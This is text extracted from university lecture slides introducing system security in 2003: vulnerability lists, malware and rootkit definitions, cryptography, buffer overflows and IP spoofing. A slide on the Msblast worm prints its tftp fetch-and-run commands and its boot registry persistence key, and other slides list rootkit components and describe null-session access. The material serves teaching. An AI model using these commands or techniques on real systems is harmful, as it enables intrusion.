1、System Security,Prabhaker Mateti Wright State University,A Few Assessments ,SysSec/SIAC2003,Mateti/WrightStateU,3,Top 20 Vulnerabilities/ NIPC+FBI+SANS (May 29, 2003),W1 Internet Information Services (IIS) W2 MDAC Remote Data Services W3 Microsoft SQL Server W4 NETBIOS - Unprotected Networking Share
2、s W5 Anonymous Logon - Null Sessions W6 LAN Manager Authentication - Weak LM Hashing W7 No Passwords or Weak Passwords W8 Internet Explorer W9 Remote Registry Access WA Windows Scripting Host,SysSec/SIAC2003,Mateti/WrightStateU,4,Top 20 Vulnerabilities/ NIPC+FBI+SANS (May 29, 2003),U1 RPC Remote Pro
3、cedure Calls U2 Apache Web Server U3 Secure Shell (SSH) U4 SNMP U5 File Transfer Protocol (FTP) U6 R-Services - Trust Relationships U7 Line Printer Daemon (LPD) U8 Sendmail U9 BIND/DNS UA No Passwords or Weak Passwords,SysSec/SIAC2003,Mateti/WrightStateU,5,Threats To The National Infrastructures (De
4、fense Science Board),Incomplete, inquisitive and unintentional blunders. Hackers driven by technical challenges. Disgruntled employees or customers seeking revenge. Criminals interested in personal financial gain or stealing services. Organized crime with the intent of hiding something or financial
5、gain. Organized terrorist groups attempting to influence U.S. policy by isolated attacks. Foreign espionage agents seeking to exploit information for economic, political, or military purposes. Tactical countermeasures intended to disrupt specific weapons or command structures. Multifaceted tactical
6、information warfare applied in a broad orchestrated manner to disrupt a major U.S. military mission. Large organized groups or nation-states intent on overthrowing the United States.,Just the facts Madam,SysSec/SIAC2003,Mateti/WrightStateU,7,Security Incidents / CERT,76,404 Jan June 2003 82,094 all
7、of 2002“CERT uses the word “incident“ as an administrative term that groups together any related set of activities; for example, activities in which the same tool or exploit is used by an intruder. A single “incident“ can involve anything from a single host computer to a very large number of host co
8、mputers, at a single site or at hundreds of thousands of sites.”,SysSec/SIAC2003,Mateti/WrightStateU,8,Number of Hosts in the DNS (isc.org Internet Domain Survey, Jan 2003),Jan 2003 171,638,297Jul 2002 162,128,493Jan 2002 147,344,723Jul 2001 125,888,197Jan 2001 109,574,429Jul 2000 93,047,785Jan 2000
9、 72,398,092,SysSec/SIAC2003,Mateti/WrightStateU,9,Terms ,SysSec/SIAC2003,Mateti/WrightStateU,11,“So you got r00ted.,Your machine has been compromised. root = administrator = super-user An unauthorized user has obtained root privileges. A rootkit may have been installed. Forensic analyses made with t
10、ools existing on that system are unreliable.,SysSec/SIAC2003,Mateti/WrightStateU,12,Denial of Service (DoS),We think of computer systems as providing services to authorized users. When a system is deliberately made to crash, or made to run legitimate users programs so very slowly that it is unusable
11、, we refer to it as a “denial of service attack.“ The attacker accomplishes this by running certain cleverly composed programs, and is pre-aware of the consequences.,SysSec/SIAC2003,Mateti/WrightStateU,13,Black Hats v. White Hats,Black hats are the “bad“ guys in that they use their knowledge to unau
12、thorizedly break into even more systems, and pass their knowledge to other insiders. White hats are the “good“ guys: they are mostly into forensics and prevention of attacks.,SysSec/SIAC2003,Mateti/WrightStateU,14,Vulnerability, ,Vulnerability: A weakness that can be exploited to cause damage. Attac
13、k: A method of exploiting a vulnerability. Threat: A motivated, capable adversary that mounts attacks.,SysSec/SIAC2003,Mateti/WrightStateU,15,Hacker v. Attacker v. Intruder,Hacker = One who programs enthusiastically, even obsessively. An expert at a particular program, as in a Unix hacker. A hacker
14、enjoys exploring the details of programmable systems and how to stretch their capabilities. A hacker has ethics.,SysSec/SIAC2003,Mateti/WrightStateU,16,Viruses,Viruses are “programs“ that modify other programs on a computer, inserting copies of themselves. Viruses are not officially programs: They c
15、annot run on their own. Need to have some host program. When the host program is run, the virus runs.,SysSec/SIAC2003,Mateti/WrightStateU,17,Structure of Viruses,V() infectExecutable(); if (triggered() doDamage();jump to main of infected program; void infectExecutable() file = chose an uninfected ex
16、ecutable file; prepend V to file; void doDamage() . int triggered() return (some test? 1 : 0); ,SysSec/SIAC2003,Mateti/WrightStateU,18,Worms,Worms are programs that propagate from computer to computer on a network. Worms can run independently. Worms may have (different) portions of themselves runnin
17、g on many different machines. Worms do not change other programs, although they may carry other code that does.,SysSec/SIAC2003,Mateti/WrightStateU,19,Trojans,A Trojan mimics the functionality of its namesake legitimate program. But has a hidden “agenda.” Ex: wu-ftpd Trojan - Login with specific use
18、r/password gives a root shell.,SysSec/SIAC2003,Mateti/WrightStateU,20,Backdoors,Also called trap doors. Allow unauthorized access to a system. The absence of backdoors cannot be established.,SysSec/SIAC2003,Mateti/WrightStateU,21,Malware,Viruses + Worms + Trojans + Any “program” that has a “maliciou
19、s” intent ,SysSec/SIAC2003,Mateti/WrightStateU,22,System Security,“System Security” = Computer Security + Network Security + Internet SecurityTrojan Horses, Viruses and Worms Privacy and Authentication TCP/IP exploits Firewalls Secure Configuration of Personal Machines Buffer Overflow and Other Bug
20、Exploitation Writing Bug-free and Secure Software Secure e-Commerce Transactions ,Current practices, and their problems,SysSec/SIAC2003,Mateti/WrightStateU,24,Improper Configuration,Out of the box installations are rarely properly configured. Standard user accounts with standard passwords. Running u
21、nneeded services. Leaving sensitive files read/write-open.,SysSec/SIAC2003,Mateti/WrightStateU,25,Fortification,Start with a properly configured system. Delete weak or unneeded components. Add protective layers. Keep detailed logs.,SysSec/SIAC2003,Mateti/WrightStateU,26,Hardened OS,Often “equated” w
22、ith fortification. Rebuilding an OS from the same source code but by using a more rigorous compiler. Redesigning portions of an OS. Statically v. dynamically configured.,SysSec/SIAC2003,Mateti/WrightStateU,27,Rootkits,“A rootkit is a collection of tools and utilities that attackers use to hide their
23、 presence and gather data to help them infiltrate further across the network. Rootkits insert backdoors, install Trojans, and patch existing programs. A rootkit may disable auditing when a certain user is logged on. A rootkit could allow anyone to log in if a certain backdoor password is used. A roo
24、tkit could patch the kernel itself, allowing anyone to run privileged code if they use a special filename Installed after the attacker gains access. Cannot be detected by firewalls or anti-virus scanners. 203 results for search “rootkit on www.packetstormsecurity.org,SysSec/SIAC2003,Mateti/WrightSta
25、teU,28,Rootkits,“Rootkit” was originally a Unix term, derived from the word “root”. Unix rootkits typically replace system binaries with trojaned binaries. The trojaned binaries hide the attacker activities,SysSec/SIAC2003,Mateti/WrightStateU,29,Windows Rootkit,A Windows rootkit typically replaces A
26、PIs, not binaries. Any program that calls those replaced APIs is potentially affected. The rootkit typically hides itself using the hacked Windows installation. A typical Windows rootkit can hide files, folders, processes, services, and registry entries,SysSec/SIAC2003,Mateti/WrightStateU,30,Windows
27、 Rootkit Examples,null.sys HE4Hook Hacker Defender Slanret He4Hook Vanquish Fu ,SysSec/SIAC2003,Mateti/WrightStateU,31,Null session,Unauthenticated connection Empty username, empty password “Null sessions can *always* be established to NT4, Windows 2000, and Windows XP machines. If the machines serv
28、er service is enabled, and ports 139 or 445 are available, then you can do a net use with anonymous credentials, and the system will respond with “Command completed successfully“. This has not changed from NT4 to Win2K to XP. - FOCUS-MS,SysSec/SIAC2003,Mateti/WrightStateU,32,Linux Rootkit Examples,L
29、inux Rootkit (LRK) TeLeKit Adore Knark t0rnkit Kernel Intrusion System (KIS) ,SysSec/SIAC2003,Mateti/WrightStateU,33,_ _ _ _ _ _ _ _ _ _ | | (_)_ _ _ _ _ | _ _ _ | |_| | _(_) |_ |_ _|_ _|_ _| | | | | _ | | | / / | |_) / _ / _ | _| |/ / | _| | | | | | | | |_| | | | | |_| | | _ (_) | (_) | |_| | | |_
30、| | | | | | |_|_|_| |_|_,_/_/_ |_| _/ _/ _|_|_|_| |_|_|_|,chfn Trojaned! User-r00t chsh Trojaned! User-r00t inetd Trojaned! Remote access login Trojaned! Remote access ls Trojaned! Hide files du Trojaned! Hide files ifconfig Trojaned! Hide sniffing netstat Trojaned! Hide connections passwd Trojaned!
31、 User-r00t ps Trojaned! Hide processes top Trojaned! Hide processes rshd Trojaned! Remote access syslogd Trojaned! Hide logs linsniffer Packet sniffer! fix File fixer! z2 Zap2 utmp/wtmp/lastlog eraser! wted wtmp/utmp editor! lled lastlog editor! bindshell port/shell type daemon! tcpd Trojaned! Hide
32、connections, avoid denies,SysSec/SIAC2003,Mateti/WrightStateU,34,Msblast.exe (Aug 12, 2003),The exploit code is derived from the well known dcom.c exploit. Exploits the MS DCOM RPC vulnerability using TCP port 135. Produces a remote command line shell. Runs the following commands: tftp -i x.x.x.x GE
33、T msblast.exe start msblast.exe msblast.exe Creates the following registry key to run at boot: HKLMSoftwareMicrosoftWindowsCurrentVersionRunwindows auto update = msblast.exe The worm will begin to scan the local class B subnet, and will also generate a random address to begin scanning at, then will
34、sequentially scan from that point forward incrementing by host address, class c, class b and class a. It can scan hosts at a rate of 20 per second. The worm contains the following text, which does not get displayed: “I just want to say LOVE YOU SAN! billy gates why do you make this possible ? Stop m
35、aking money and fix your software!”,SysSec/SIAC2003,Mateti/WrightStateU,35,Booting Up,BIOS OS Kernel Initialization User logins,SysSec/SIAC2003,Mateti/WrightStateU,36,boot.ini,boot loader timeout=30 default=multi(0)disk(0)rdisk(0)partition(9)WINDOWS operating systems C:bootsecthdc3grub.bin=“Booting
36、From FAT32on120GB“ multi(0)disk(0)rdisk(0)partition(3)WINDOWS=“Windows XP Pro r0 p3“ /fastdetect multi(0)disk(0)rdisk(0)partition(9)WINDOWS=“Windows XP Pro r0 p9“ /fastdetect multi(0)disk(0)rdisk(0)partition(14)WINDOWS=“Windows XP Pro r0 p14“ /fastdetect C:bootsecthdc3grub.bin=“Linux via Grub“,SysSe
37、c/SIAC2003,Mateti/WrightStateU,37,/boot/grub/menu.lst,timeout 10 default 1title failsafe kernel (hd0,6)/boot/vmlinuz root=/dev/hda7 failsafe devfs=nomount hdc=ide-scsi acpi=off initrd (hd0,6)/boot/initrd.imgtitle linux-smp kernel (hd0,6)/boot/vmlinuz-smp root=/dev/hda7 devfs=mount hdc=ide-scsi acpi=
38、off initrd (hd0,6)/boot/initrd-smp.imgtitle windows root (hd0,0) chainloader +1,SysSec/SIAC2003,Mateti/WrightStateU,38,Human User Authentication,Something you know (e.g., a password or other secret); Something you have (e.g., smart card, credit card); Something you are (e.g., fingerprints, retinal s
39、can, voice print).,SysSec/SIAC2003,Mateti/WrightStateU,39,Passwords,Weak passwords; social engineering. telnet, ftp, passwords travel the network in the clear; can be sniffed. One Time Passwords,SysSec/SIAC2003,Mateti/WrightStateU,40,Cryptography,“Computationally Infeasible” N = 2a * 3b * 5c * 7d *
40、. One way hash function takes a variable-length input sequence of bytes and converts it into a fixed-length sequence. designed to be computationally infeasible to reverse the process,SysSec/SIAC2003,Mateti/WrightStateU,41,Symmetric Keys,sender and receiver of a message share a single, common key. If
41、 ct = encryption (pt, key), then pt = decryption (ct, key). DES IDEA Blowfish,SysSec/SIAC2003,Mateti/WrightStateU,42,Public and Private Keys,a public key known to everyone, and a private or secret key known only to the recipient of the message The two keys are mathematically related, yet it is compu
42、tationally infeasible to deduce one from the other. A global registry of public keys is needed RSA,SysSec/SIAC2003,Mateti/WrightStateU,43,Man-in-the-Middle Attack,The public key-based communication between say Alice and Bob is vulnerable. Let us assume that Mallory, a cracker, not only can listen to
43、 the traffic between Alice and Bob, but also can modify, delete, and substitute Alices and Bobs messages, as well as introduce new ones. Mallory can impersonate Alice when talking to Bob and impersonate Bob when talking to Alice. Here is how the attack works. Bob sends Alice his public key. Mallory
44、intercepts the key and sends her own public key to Alice. Alice generates a random session key, encrypts it with “Bobs“ public key (which is really Mallorys), and sends it to Bob. Mallory intercepts the message. He decrypts the session key with his private key, encrypts it with Bobs public key, and
45、sends it to Bob. Bob receives the message thinking it came from Alice. He decrypts it with his private key and obtains the session key. Alice and Bob start exchanging messages using the session key. Mallory, who also has that key, can now decipher the entire conversation.,SysSec/SIAC2003,Mateti/Wrig
46、htStateU,44,Buffer Overflow,“Quick: Whats the computer vulnerability of the decade? Its not the Y2K bug, according to computer science and security analysts, but a security weakness known as the buffer overflow .” Executable code is injected on to the runtime stack. The return address that was on th
47、e stack is modified to point to the beginning of this code. The executable code chosen produces a shell. A root-privileged program is so exploited; so, you are r00ted.,SysSec/SIAC2003,Mateti/WrightStateU,45,Buffer Overflow,Many of the Top 20 vulnerabilities are buffer overflow problems. Caused by a
48、simple class of programming errors. C and its promiscuous style.,SysSec/SIAC2003,Mateti/WrightStateU,46,Network Security,Ethernet is a broadcast medium. Packet switching.,SysSec/SIAC2003,Mateti/WrightStateU,47,Security of the Connection,Least secure: Wireless networking Second least secure: Always-o
49、n wired connections Second most secure: Intermittent wired connections (dial-up) Most secure: Never connected.,SysSec/SIAC2003,Mateti/WrightStateU,48,TCP/IP Design Problems,Designed with too little concern for security. All data, including various fields in the protocol headers, are sent in the clea
50、r. Sender and Receiver in the packet can be spoofed.,SysSec/SIAC2003,Mateti/WrightStateU,49,IP4 Spoofing,IP address: a.b.c.d, 4-bytes. IP packet contains the IP addresses of sender and receiver. Everything in the clear. IP spoofing replaces the IP address of (usually) the sender or (in rare cases) the destination with a different address. Services that authenticate based on the IP addresses are vulnerable. RPC, NFS, r-commands (rlogin, rsh, rcp, etc.), X windows, ,
